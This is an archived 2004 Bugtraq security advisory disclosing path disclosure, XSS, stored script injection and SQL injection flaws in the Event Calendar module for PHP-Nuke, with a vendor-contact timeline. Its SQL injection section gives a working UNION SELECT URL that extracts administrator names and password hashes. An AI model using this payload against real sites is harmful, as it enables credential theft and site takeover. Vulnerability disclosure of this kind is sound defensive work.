[prev in list] [next in list] [prev in thread] [next in thread] 

List:       bugtraq
Subject:    [waraxe-2004-SA#038 - Multiple vulnerabilities in Event Calendar
From:       Janek Vind <come2waraxe () yahoo ! com>
Date:       2004-11-16 23:04:21
Message-ID: 20041117042243.23012.qmail () www ! securityfocus ! com
[Download RAW message or body]





{================================================================================}
{                              [waraxe-2004-SA#038]                              }
{================================================================================}
{                                                                                }
{         [ Multiple vulnerabilities in Event Calendar module for PhpNuke ]      }
{                                                                                }
{================================================================================}
                                                                                      \
                
Author: Janek Vind "waraxe"
Date: 17. November 2004
Location: Estonia, Tartu
Web: http://www.waraxe.us/index.php?modname=sa&id=38


Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Module's Name: Event Calendar
Module's Version: 2.13 - March 16th, 2004
Module's Description: Provides an event calendar for PHP-Nuke communities.
License: GNU/GPL
Author's Name: Original author - Rob Sutton. Development continued by Holbrookau.
Author's Email: phpnuke@holbrookau.net

Event Calendar - a module for PHP-Nuke.
Based on version 1.5 by Rob Sutton, the Event Calendar found here is much updated
and features many improvments and add-ons. For example, the administration area \
features configuration via a graphical interface, posting of events can be moderated \
and users even have the option of adding comments to any event.

Homepage: http://phpnuke.holbrookau.net/


Vulnerabilities:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

This piece of sowtware has many security related flaws due to poor user-submitted \
data handling. 


A - Full Path Disclosure
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

A1 - full path disclosure in "config.php":

http://localhost/nuke73/modules/Calendar/config.php

Warning: main(modules/Calendar/configset.php): failed to open stream: No such file or \
                directory in D:\apache_wwwroot\nuke73\modules\Calendar\config.php on \
                line 11
Warning: main(): Failed opening 'modules/Calendar/configset.php' for inclusion \
(include_path='.;c:\php4\pear') in \
                D:\apache_wwwroot\nuke73\modules\Calendar\config.php on line 11
Warning: main(mainfile.php): failed to open stream: No such file or directory in \
                D:\apache_wwwroot\nuke73\modules\Calendar\config.php on line 14
Warning: main(): Failed opening 'mainfile.php' for inclusion \
(include_path='.;c:\php4\pear') in \
                D:\apache_wwwroot\nuke73\modules\Calendar\config.php on line 14
Warning: main(modules//language/lang-english.php): failed to open stream: No such \
                file or directory in \
                D:\apache_wwwroot\nuke73\modules\Calendar\config.php on line 19
Warning: main(): Failed opening 'modules//language/lang-english.php' for inclusion \
(include_path='.;c:\php4\pear') in \
D:\apache_wwwroot\nuke73\modules\Calendar\config.php on line 19


A2, A3 - full path disclosure in "index.php" and "submit.php":

http://localhost/nuke73/modules/Calendar/index.php
http://localhost/nuke73/modules/Calendar/submit.php


B - XSS aka cross site scripting:

Examples:

http://localhost/nuke73/modules.php?name=Calendar&file=submit&type=[xss code here]
http://localhost/nuke73/modules.php?name=Calendar&file=submit&op2=Preview&day=[xss \
code here] http://localhost/nuke73/modules.php?name=Calendar&file=submit&op2=Preview&month=[xss \
code here] http://localhost/nuke73/modules.php?name=Calendar&file=submit&op2=Preview&year=[xss \
code here] http://localhost/nuke73/modules.php?name=Calendar&file=submit&op2=Preview&type=[xss \
code here]


C - script injection in calendar event comments:

It's serious bug - anyone can insert javascript exploit code to event comments
and if user or admin will read it, javascript will trigger and bad things can
happen - like cookie theft, arbitrary admin operations, etc.


D - critical sql injection bugs in code:

If we take a deep look at source code, then there can be found multiple sql queries,
where some variables, mostly "$eid" and "$cid" ARE NOT surrounded with single quotes.
Therefore sql injection is possible. Further exploitation will depend on database 
software and version. In case of the mysql version 4.x with UNION functionality \
enabled, arbitrary data can be retrieved from database, inluding admin(s) \
authentication credentials. As tradition, there is proof of concept:

----------------[ real life exploit ]---------------

http://localhost/nuke73/modules.php?name=Calendar&file=index&type=view&eid=-99%20UNION%20ALL%20SELECT
 %201,1,aid,1,pwd,1,1,1,1,1,1,1,1,1,1%20FROM%20nuke_authors%20WHERE%20radminsuper=1

----------------[/real life exploit ]---------------


How to fix:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vendor contacted: 06. September 2004
Vendor responded: 06. September 2004
Detailed list of problems sent to vendor: 08. September 2004

Since then no more response from software developer and downloadable version
still unpatched.

For help with patching look @ here - http://www.waraxe.us/forums.html


Additional recources:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Free proxy lists - http://www.waraxe.us/forum/viewforum.php?f=21
Base64 online tool - http://base64-encoder-online.waraxe.us/base64/base64-encoder.php


Greetings:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Greets to Raido Kerna, icenix, g0df4th3r and slimjim100!
Tervitused - Heintz ja Maku!

Contact:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    come2waraxe@yahoo.com
    Janek Vind "waraxe"

    Homepage: http://www.waraxe.us/

---------------------------------- [ EOF ] ------------------------------------


[prev in list] [next in list] [prev in thread] [next in thread] 

Configure | About | News | Add a list | Sponsored by KoreLogic